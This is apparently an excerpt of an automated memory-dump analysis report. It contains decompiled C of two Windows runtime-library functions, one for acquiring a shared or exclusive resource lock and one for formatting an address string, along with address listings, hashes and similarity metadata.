                                                                                                                                                              0x00980bcd
                                                                                                                                                              0x00980b89
                                                                                                                                                              0x00980b89
                                                                                                                                                              0x00980b90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b96
                                                                                                                                                              0x00980a04
                                                                                                                                                              0x00980a04
                                                                                                                                                              0x00980b9a
                                                                                                                                                              0x00980b9a
                                                                                                                                                              0x00980b9b
                                                                                                                                                              0x00980b9f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ba5
                                                                                                                                                              0x00980ac7
                                                                                                                                                              0x00980aca
                                                                                                                                                              0x009aeacf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeade
                                                                                                                                                              0x009aeade
                                                                                                                                                              0x009aeae3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeaf3
                                                                                                                                                              0x009aeaf6
                                                                                                                                                              0x009aeaf7
                                                                                                                                                              0x009aeafe
                                                                                                                                                              0x009aeb01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb01
                                                                                                                                                              0x009aeacf
                                                                                                                                                              0x00980ad0
                                                                                                                                                              0x00980ad4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ada
                                                                                                                                                              0x00980ae6
                                                                                                                                                              0x00980c34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c47
                                                                                                                                                              0x00980c49
                                                                                                                                                              0x00980c4a
                                                                                                                                                              0x00980c4e
                                                                                                                                                              0x00980c51
                                                                                                                                                              0x00980c54
                                                                                                                                                              0x00980c57
                                                                                                                                                              0x00980c5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c60
                                                                                                                                                              0x00980afb
                                                                                                                                                              0x00980afe
                                                                                                                                                              0x00980b02
                                                                                                                                                              0x00980b05
                                                                                                                                                              0x00980b08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b08
                                                                                                                                                              0x00980ae6
                                                                                                                                                              0x00980b44
                                                                                                                                                              0x009809f8
                                                                                                                                                              0x009809f8
                                                                                                                                                              0x009809f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeaa0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction ID: 83dd73e842587bd7084bbffb9717ff731d2d287d223a8f8d1de17edf7309f793
                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction Fuzzy Hash: 98A1BD31D0030ADFDFA4EF64C8457BEB7B8AF95304F24856AD892A7341D7349A49CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00980554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00980554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a201c0;
									_push(_t144);
									_push(0);
									_t51 = E0093F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00984FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00993F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00993F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E009C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00993F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00983915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a201c0;
												_push(_t138);
												_push(0);
												_t58 = E0093F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00984FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00993F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00993F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E009C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00993F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00983915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00965384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0093F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00983915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0093F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00983915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0093F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00983915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00965329(_t110, _t138);
																_t69 = E009653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                              0x0098055a
                                                                                                                                                              0x0098055d
                                                                                                                                                              0x00980563
                                                                                                                                                              0x00980566
                                                                                                                                                              0x009805d8
                                                                                                                                                              0x009805e2
                                                                                                                                                              0x009805e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009805e7
                                                                                                                                                              0x009805e7
                                                                                                                                                              0x009805ea
                                                                                                                                                              0x009805f3
                                                                                                                                                              0x009805f3
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980569
                                                                                                                                                              0x00980569
                                                                                                                                                              0x00980569
                                                                                                                                                              0x0098056b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a217f
                                                                                                                                                              0x009a2183
                                                                                                                                                              0x009a225b
                                                                                                                                                              0x009a225f
                                                                                                                                                              0x009a2189
                                                                                                                                                              0x009a218c
                                                                                                                                                              0x009a218f
                                                                                                                                                              0x009a2194
                                                                                                                                                              0x009a2199
                                                                                                                                                              0x009a219d
                                                                                                                                                              0x009a21a0
                                                                                                                                                              0x009a21a2
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21d0
                                                                                                                                                              0x009a21d6
                                                                                                                                                              0x009a21de
                                                                                                                                                              0x009a21e2
                                                                                                                                                              0x009a21e8
                                                                                                                                                              0x009a21e9
                                                                                                                                                              0x009a21ec
                                                                                                                                                              0x009a21f1
                                                                                                                                                              0x009a21f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21f8
                                                                                                                                                              0x009a21fb
                                                                                                                                                              0x009a2206
                                                                                                                                                              0x009a220b
                                                                                                                                                              0x009a220c
                                                                                                                                                              0x009a2217
                                                                                                                                                              0x009a2226
                                                                                                                                                              0x009a222b
                                                                                                                                                              0x009a222c
                                                                                                                                                              0x009a222f
                                                                                                                                                              0x009a2232
                                                                                                                                                              0x009a2235
                                                                                                                                                              0x009a2235
                                                                                                                                                              0x009a223a
                                                                                                                                                              0x009a223f
                                                                                                                                                              0x009a2241
                                                                                                                                                              0x009a2243
                                                                                                                                                              0x009a2248
                                                                                                                                                              0x009a2248
                                                                                                                                                              0x009a224d
                                                                                                                                                              0x009a224f
                                                                                                                                                              0x009a2262
                                                                                                                                                              0x009a2263
                                                                                                                                                              0x009a2268
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2276
                                                                                                                                                              0x009a2279
                                                                                                                                                              0x009a227e
                                                                                                                                                              0x009a2283
                                                                                                                                                              0x009a2287
                                                                                                                                                              0x009a228a
                                                                                                                                                              0x009a228d
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22be
                                                                                                                                                              0x009a22c4
                                                                                                                                                              0x009a22cc
                                                                                                                                                              0x009a22d0
                                                                                                                                                              0x009a22d6
                                                                                                                                                              0x009a22d7
                                                                                                                                                              0x009a22da
                                                                                                                                                              0x009a22df
                                                                                                                                                              0x009a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22e6
                                                                                                                                                              0x009a22e9
                                                                                                                                                              0x009a22f4
                                                                                                                                                              0x009a22f9
                                                                                                                                                              0x009a22fa
                                                                                                                                                              0x009a2305
                                                                                                                                                              0x009a2314
                                                                                                                                                              0x009a2319
                                                                                                                                                              0x009a231a
                                                                                                                                                              0x009a231d
                                                                                                                                                              0x009a2320
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2328
                                                                                                                                                              0x009a232d
                                                                                                                                                              0x009a232f
                                                                                                                                                              0x009a2331
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a233b
                                                                                                                                                              0x009a233d
                                                                                                                                                              0x009a2350
                                                                                                                                                              0x009a2351
                                                                                                                                                              0x009a2356
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a235b
                                                                                                                                                              0x009a235d
                                                                                                                                                              0x00965367
                                                                                                                                                              0x0096536b
                                                                                                                                                              0x00965372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2369
                                                                                                                                                              0x009a236a
                                                                                                                                                              0x009a236c
                                                                                                                                                              0x009a2371
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a237a
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a2385
                                                                                                                                                              0x009a2386
                                                                                                                                                              0x009a2389
                                                                                                                                                              0x009a238e
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x00965378
                                                                                                                                                              0x0096537c
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2397
                                                                                                                                                              0x009a239c
                                                                                                                                                              0x009a23a2
                                                                                                                                                              0x009a23a3
                                                                                                                                                              0x009a23a6
                                                                                                                                                              0x009a23ab
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b4
                                                                                                                                                              0x009a23b9
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23bc
                                                                                                                                                              0x009a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999153
                                                                                                                                                              0x00999158
                                                                                                                                                              0x0099915a
                                                                                                                                                              0x0099915e
                                                                                                                                                              0x00999160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999171
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999160
                                                                                                                                                              0x009a23c6
                                                                                                                                                              0x009a23ce
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2293
                                                                                                                                                              0x009a2295
                                                                                                                                                              0x009a229a
                                                                                                                                                              0x009a22a1
                                                                                                                                                              0x009a22a3
                                                                                                                                                              0x009a22a7
                                                                                                                                                              0x009a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22ab
                                                                                                                                                              0x009a22ad
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x009a22b1
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653cb
                                                                                                                                                              0x009653ce
                                                                                                                                                              0x009653d0
                                                                                                                                                              0x009653d4
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d8
                                                                                                                                                              0x009653e3
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a2349
                                                                                                                                                              0x009a234d
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x009a21a4
                                                                                                                                                              0x009a21a4
                                                                                                                                                              0x009a21a6
                                                                                                                                                              0x009a21a8
                                                                                                                                                              0x009a21ac
                                                                                                                                                              0x009a21b6
                                                                                                                                                              0x009a21b8
                                                                                                                                                              0x009a21bc
                                                                                                                                                              0x009a21be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c0
                                                                                                                                                              0x009a21c2
                                                                                                                                                              0x009a21c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c4
                                                                                                                                                              0x009a21c6
                                                                                                                                                              0x009a21c6
                                                                                                                                                              0x009a21c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c8
                                                                                                                                                              0x009a21a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2183
                                                                                                                                                              0x0098057b
                                                                                                                                                              0x0098057d
                                                                                                                                                              0x00980581
                                                                                                                                                              0x00980583
                                                                                                                                                              0x009a2178
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980589
                                                                                                                                                              0x0098058f
                                                                                                                                                              0x0098058f
                                                                                                                                                              0x00980583
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A2206
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                              • Opcode ID: 78d23f22b7f1a98c3c72a57986b9f9f01f4c09afbe79f77e2418958fa7dbf8fc
                                                                                                                                                              • Instruction ID: 2170f7e647c3736b47d8618dd20bb030bae5003de747b4489038c3f2b17f1aa6
                                                                                                                                                              • Opcode Fuzzy Hash: 78d23f22b7f1a98c3c72a57986b9f9f01f4c09afbe79f77e2418958fa7dbf8fc
                                                                                                                                                              • Instruction Fuzzy Hash: 99512631B042116BEF189F1CCC81F6673A9AFD5720F218229FD55DB285D921EC418BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E009814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa22088; // 0x7741ce3b
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00977707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00977707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00977707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00942340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0094E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                              0x009814c0
                                                                                                                                                              0x009814cb
                                                                                                                                                              0x009814d2
                                                                                                                                                              0x009814d6
                                                                                                                                                              0x009814da
                                                                                                                                                              0x009814de
                                                                                                                                                              0x009814e3
                                                                                                                                                              0x0098157a
                                                                                                                                                              0x0098157a
                                                                                                                                                              0x009814f1
                                                                                                                                                              0x009814f3
                                                                                                                                                              0x009aea0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aea15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aea15
                                                                                                                                                              0x009814f9
                                                                                                                                                              0x009814f9
                                                                                                                                                              0x009814fe
                                                                                                                                                              0x00981504
                                                                                                                                                              0x009aea1a
                                                                                                                                                              0x009aea1f
                                                                                                                                                              0x009aea21
                                                                                                                                                              0x009aea22
                                                                                                                                                              0x009aea27
                                                                                                                                                              0x009aea2a
                                                                                                                                                              0x009aea2a
                                                                                                                                                              0x00981515
                                                                                                                                                              0x00981517
                                                                                                                                                              0x0098156d
                                                                                                                                                              0x00981572
                                                                                                                                                              0x00981575
                                                                                                                                                              0x00981575
                                                                                                                                                              0x0098151e
                                                                                                                                                              0x009aea50
                                                                                                                                                              0x009aea55
                                                                                                                                                              0x009aea58
                                                                                                                                                              0x009aea58
                                                                                                                                                              0x0098152e
                                                                                                                                                              0x00981531
                                                                                                                                                              0x00981533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981535
                                                                                                                                                              0x00981541
                                                                                                                                                              0x00981549
                                                                                                                                                              0x00981549
                                                                                                                                                              0x00981533
                                                                                                                                                              0x009814f3
                                                                                                                                                              0x00981559

                                                                                                                                                              APIs
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 009AEA22
                                                                                                                                                                • Part of subcall function 009813CB: ___swprintf_l.LIBCMT ref: 0098146B
                                                                                                                                                                • Part of subcall function 009813CB: ___swprintf_l.LIBCMT ref: 00981490
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0098156D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: dd0038cd4915145c2fac10d0072244fd84d8a925157a492593fe1f915872d077
                                                                                                                                                              • Instruction ID: 4394eb960096943c0751b72f9e361f7cefe659537d0dd6524dc1c34d8803a3ff
